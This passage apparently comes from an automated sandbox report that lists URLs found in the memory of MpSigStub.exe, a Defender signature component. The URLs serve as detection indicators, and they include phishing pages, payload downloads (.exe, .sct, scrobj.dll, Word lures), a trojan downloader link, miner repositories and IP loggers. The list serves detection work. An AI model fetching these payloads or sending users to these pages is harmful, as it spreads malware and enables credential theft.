Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://excavationtrick.com/dir/
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://exploshot.com/24.gif
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://expressen.se/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://extranet.carlsonwagonlit.com/gdsscripts/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://extraosseous.com/zik/
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: https://f.coka.la/6wzxbj.sct
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://faithpays.sowetoinnovations.co.za/khro/php/continue1.php
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://faog.org.hk/scanner/overwatch.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://faxzmessageservice.club
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://fazadminmessae.info
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://fazalandsons.com.pk/wp-includes/ixr/class-ixr-base64.php
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://feedbackportal.download/ecm/ibm/3173379797/converter.dot
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: https://ferra.xyz/glsdil.php
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://fersite24.xyz/sa2234332324if3g4f23.php
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: https://filedropper.com/main/
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://fileshare24.top/3223if3g4f23.php
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://filingrimm.com/ecm/ibm/3149569888/converter.dot
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://find-your-profithere11.com/?m=1&o=hybpdzu&t=yrcrt&u=lb8k605
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/gr-nte-rgwea-fbg-nh-yt.appspot.com/o/dbvfuery%2fw-euy-f8
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/jv-i4t-78gy-9h.appspot.com/o/bg-i547-gt9%2f84-75tr-g87.h
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-2141562284063338550.appspot.com/o/57-8574-54%2fg
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/project-6870194580473866225.appspot.com/o/f-grg45-t%2f24
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/relaxdaysun.appspot.com/o/g%20ct%206%20yg-u%2ff%20cr%20y
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://flopyrhnd.tk/pr/lan.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://flyaircario.com/i/post.php
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://folkloreeconomy.com/next.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://formspree.io/f/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://fpvtunes.binaryprotectors.com/msreal/jreside
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/gclxo6
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://fqe.short.gy/j7xs8j
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://fr-an1.link/?e=atloperat
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://freelanceranik.com/group.php
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://friendoffishing.com//wp-content/themes/calliope/template-parts/wp_data.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://fs01n4.sendspace.com/dlpro/20fb7f511bc258709195b9ca0c6c258e/595e5d75/k6zafp/x6iu1omg_2_.zips
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://fs01n5.sendspace.com/dl/23da2e4841c1800d1954130c638d13c3/575d2f1645706e13/ooru9w/google%20ch
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: https://fslqzt.info/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=accounts
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=info
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://fx.pb-invioce.online/?e=m.turqueto
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://gantiatiainzx.us-south.cf.appdomain.cloud/?bbre=zxoiasxz#/abrimvh-&
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://gaspee.info/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://gatipackers-movers.com/wp-content/plugins/(
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://geoconsultantservices.com/some/next.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://get.adobe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp String found in binary or memory: https://gettraff.ru/aws?keyword=
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: https://gez.org.zw/errorpages/load/
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://gfdefrgthyujjyhtbgrvfcdxs.s3.us-east-2.amazonaws.com/afghtyujytgrfdegt.html
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://gfoundries.ru/
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://gg.gg/ig6f0
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://gidbasket.com/drms/ind.html
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://gist.githubusercontent.com/razdorhere
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://github-production-release-asset-2e65be.s3.amazonaws.com/512295
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://github.com/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Alexuiop1337/Trojan-Downloader/raw/master/fee.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Bendr0id/xmrigCC
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://github.com/JulianG97/TextEditor
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Programmist6996
Source: MpSigStub.exe, 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc
Source: MpSigStub.exe, 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc-amd
Source: MpSigStub.exe, 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcc/
Source: MpSigStub.exe, 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp String found in binary or memory: https://github.com/bendr0id/xmrigcchttps://github.com/bendr0id/xmrigcc-amdhttps://github.com/bendr0i
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: https://github.com/georgw777/
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: https://github.com/georgw777/MediaManager
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: https://github.com/nwoolls/multiminer
Source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscan
Source: MpSigStub.exe, 00000023.00000003.18351150877.0000015B1B40C000.00000004.00000001.sdmp String found in binary or memory: https://github.com/robertdavidgraham/masscanx
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/samratashok/nishang
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: https://gmaax.in/wp-includes/blocks/embed/
Source: MpSigStub.exe, 00000023.00000003.18322610510.0000015B1A546000.00000004.00000001.sdmp String found in binary or memory: https://go.wikitextbooks.info
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/5gdfwn
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/6bvmse)
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/t4wd4iscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://goo.gl/yuzvvg
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://goodbyegraffitiseattle.com/jhjdhjd/files/index.php)
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://goodiebagkanvas.com/m/?login=ithelp
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://goofy-davinci-6ad239.netlify.app/)/s/uri
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://gposervitech.com/wp-content/cgi-bins/files/office365html/office
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://grabify.link/ibac74
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://grace-memorial-church.com/shares/share/fghjke77383oned/share
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://griginet.com/ggassh/sshrod.php
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/doc/reserva.wiz
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://gritodopovo.com.br/natalidade/new.wiz
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: https://gruasphenbogota.com/c74hwggxi/ka.html
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://gtec24.com/0mqp0yn6/kk.html
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://h9-mil.live/?e=anita.masyk
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: https://hamality.xyz
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: https://handrug.com.py/baterfly/aleacarte.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://hard10.authorizeddns.us/1?zved58il3scrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://hardshipaccompany.com/next.php
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://hardx2.mydad.info/1?ef8il3hesscrobj.dll
Source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp String found in binary or memory: https://hastebin.com/raw/
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://hawkloger.shortcm.li/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://help-lolooo.cf/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://hghfjklkjlk.dvgwrgwjrgkhowrg.gb.net/qwertyxls/zip/document.php
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://hillsbed.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/ajo/processor.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/egab/processor.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/emzf/processor.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/lin/processor.php
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://hitechceramics.com/tism/processor.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://hitecsec.org/wp-includes/js/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: https://hjnkmjkm.duckdns.org/bb/sf-express.php
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: https://hk.sd-inhcice.online/?e=sylvie.nicol
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://holidayinndarlingharbour-my.sharepoint.com/personal/dos_holidayinndarlingharbour_com_au/_lay
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/check.doc
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://holisticxox.com/doc/payment.doc
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://houses43s.somdhouths.xyz/?e=
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://hrupd00t.rest/kgwdt5pthdawnnewibpybtyht/?i8kka7gioxp=c2f1zglhy2fyz29pddiwmebzyxvkawfjyxjnby5
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://http://bit.do/fq3bf
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://humana.service-now.com/arp
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://hvaclinic.com/redirect/amvhbi1mcmfuy29pcy52yxnzzxvyqgjlzmvzys5jb20=
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://hx.ns-inhince.online/?e=arnaldi
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/c1skhwk.png
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: https://ia601404.us.archive.org/7/items/bypass_98778/bypass_98778.txt
Source: MpSigStub.exe, 00000023.00000003.18314518681.0000015B1B7A8000.00000004.00000001.sdmp String found in binary or memory: https://icam%.cl/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dll
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: https://ieaspk.com/instagram.dllx
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://iffusedtrac.xyz/3/bbc.exe
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: https://ikkon.pk/ds/161120.gif
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://indygrace.com/sun/scan-img-rcsh-253018.exe
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://ines-arnshoff.de/
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: https://inetaccelerator.ru/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/11/i.php
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: https://injectsorals.com/oja/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: https://integratedcombatcentre.com.au/wp-content/uploads/tmp/outlook365/outlook365/index.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://inter-pipe.ga/
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: https://internetbanking.caixa.gov.br/SIIBC/index
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: https://ip4.seeip.org
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1Lhk57
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://iplusprima.life/wp-content/
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: https://iqras.pk/inno/inno/innoc.doc
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: https://irecruiter.immentia.com/storage/framework/cache/data/0e/nC7vWe43YwJjj.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/b2qsmx
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/eakecx
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/fnchq3
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/nr85ic
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/p1cyuo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/qyzae1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/x73tnb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://is.gd/xwjqn2
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: https://istitutobpascalweb.it/mynotescom/renoovohostinglilnuxadvanced.php
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/2aed6
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/9h7cn
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/cshd3
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/intdn
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/jbbhj
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/oiowg
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vlafv
Source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp String found in binary or memory: https://itsssl.com/vyqcm
Source: MpSigStub.exe, 00000023.00000003.18283593829.0000015B1A80D000.00000004.00000001.sdmp String found in binary or memory: https://itvantaqe.com/wp/wp-admin/user/class.php
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://izmirdentalimplant.net/wp-content/themes/neve/next.php
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://j-k9.club/?e=JPohlman
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: https://jabaltoor.com/copy/img/blog/cat-post/r7gnor1h0.php
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://jadr223.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://jammuking.xyz/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: https://jaypalsinh.ngsoftweb.eEvvmU%in/OLD_07032021/classeEvvmU%es/PHPExcel/Calculation/Token/pm4Cb7
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: https://jbg-electric.com/css/x0sjv3efx.php
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: https://jbs-stamping.square.site/
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: https://jcenter.bintray.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://jdjuwuryh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: https://jiagnmehn.gq/post.php
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: https://jira3.cerner.com/rest/api/2/issue/
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: https://jjjkjkeh.s3-eu-west-1.amazonaws.com/image2.png
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: https://joro4wixma.azurewebsites.net/wp-admin
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: https://josematechky.com/docs/ec21_order.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: https://jovial-pasteur.159-89-118-202.plesk.page/wp-content/uploads/index.php
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: https://jrat.io
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: https://js-cloud.com/gate.php?token=
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp String found in binary or memory: https://juniorleadersacademy.com/reporthotmail.php
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: https://jupiternepal.com/name/stducount/php/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: https://jusreihnt.com/dpz/?email=
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: https://kamalandcompany.com/drms/fert.html
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: https://kelwinsales.com/ds/1702.gif
